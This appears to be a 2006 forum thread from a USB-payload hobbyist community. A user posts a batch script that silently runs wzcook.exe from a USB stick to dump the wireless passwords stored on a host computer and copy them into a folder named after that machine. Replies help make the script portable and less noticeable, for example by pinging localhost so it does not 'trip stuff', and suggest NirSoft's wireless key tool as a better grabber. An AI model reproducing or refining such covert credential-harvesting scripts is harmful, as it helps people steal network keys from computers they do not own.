r1 Posted October 20, 2006 Posted October 20, 2006 i'm using spektormax's payload and it's working great, but i just wanted to add wzcook.exe to the mix so i wrote a .bat file for it --------------------------------------------------------------------- @ehco off start /b G:WIPwzcookwzcook.exe ::FOR WAITING ON WZCOOK TO FINSH (15 SEC) PING 1.1.1.1 -n 1 -w 15000 >NUL mkdir wipwzcook%computername% taskkill /F /IM wzcook.exe tskill wzcook.exe move c:wepkeys.txt WIPWZCOOK%computername% ---------------------------------------------------------------------- this .bat file only works in my laptop because the only way i could run wzcook.exe was to put G: but not all computers have the same drive letter for the usb drive. so my question is how can i rewrite this so wzcook.exe can work on any computer? p.s. i don't know if i need both of them but i put taskkill /F /IM wzcook.exe and tskill wzcook.exe so it would kill the task on home and pro -r1 Quote
spektormax Posted October 20, 2006 Posted October 20, 2006 couple things, one tskill has issues killing prosseses if they hand, taskill doesnt. Secoudn ping localhost not 1.1.1.1 because 1.1.1.1 can trip stuff while localhost uusuly doesnt, 3 what does this do? and 4 where can I get the exe 4, do WIP instead of g: Quote
r1 Posted October 20, 2006 Author Posted October 20, 2006 thanks for replying, and i have fixed the ping loacl host and tskill. as far as what the progrm is, it retrieves the wireless passwords that the computer has used b4. its a cool little app and its perfect addon to this usb hack. where to get it? it comes in the aircrack -ng bundle **http://download.aircrack-ng.org/aircrack-ng-0.6.2-win.zip** i tried WIP instead of G: and it doesn't work right i have tried everything i could think of and nothing works. im confused about it :( -r1 Quote
renegadecanuck Posted October 20, 2006 Posted October 20, 2006 Try using the nircmd program. Then type this in .WIPCMDnircmd.exe execmd CALL .WIPwzcookwzcook.exe And you spelled "echo" wrong. Quote
xFilthyxJesusx Posted October 20, 2006 Posted October 20, 2006 why not use this http://www.nirsoft.net/utils/wireless_key.html Quote
r1 Posted October 20, 2006 Author Posted October 20, 2006 wireless key from nirsoft does work better thanks for bringing that to my attention -r1 Quote
deathwarder Posted October 22, 2006 Posted October 22, 2006 thanks, with this I have been able to speed up my wireless detection batch, thanks! Quote
Spartain X Posted November 8, 2006 Posted November 8, 2006 why not use thishttp://www.nirsoft.net/utils/wireless_key.html the nirsoft program is better in my opinion Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.